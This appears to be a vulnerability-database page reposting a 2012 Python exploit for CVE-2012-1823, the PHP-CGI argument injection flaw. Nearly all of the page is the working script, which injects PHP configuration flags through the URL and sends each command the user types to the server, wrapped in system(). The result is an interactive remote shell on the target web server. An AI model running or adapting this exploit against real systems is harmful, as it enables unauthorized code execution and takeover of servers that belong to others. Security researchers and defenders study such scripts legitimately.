Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2012-1823 CVE-2012-1823

Publish Date: 24 Dec 2012

Author: infodox

Source

                							

                #!/usr/bin/python
import requests
import sys

print """
CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution
This exploit abuses an arguement injection in the PHP-CGI wrapper
to execute code as the PHP user/webserver user.
Feel free to give me abuse about this &lt;3
- infodox | insecurety.net | @info_dox
"""

if len(sys.argv) != 2:
    print "Usage: ./cve-2012-1823.py &lt;target&gt;"
    sys.exit(0)

target = sys.argv[1]
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
lol = """&lt;?php system('"""
lol2 = """');die(); ?&gt;"""
print "[+] Connecting and spawning a shell..."
while True:
    try:
        bobcat = raw_input("%s:~$ " %(target))
        lulz = lol + bobcat + lol2
        hax = requests.post(url, lulz)
        print hax.text
    except KeyboardInterrupt:
        print "\n[-] Quitting"
        sys.exit(1)


<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

PHP-CGI Argument Injection Remote Code Execution

Vulmon Search

About

Products

Connect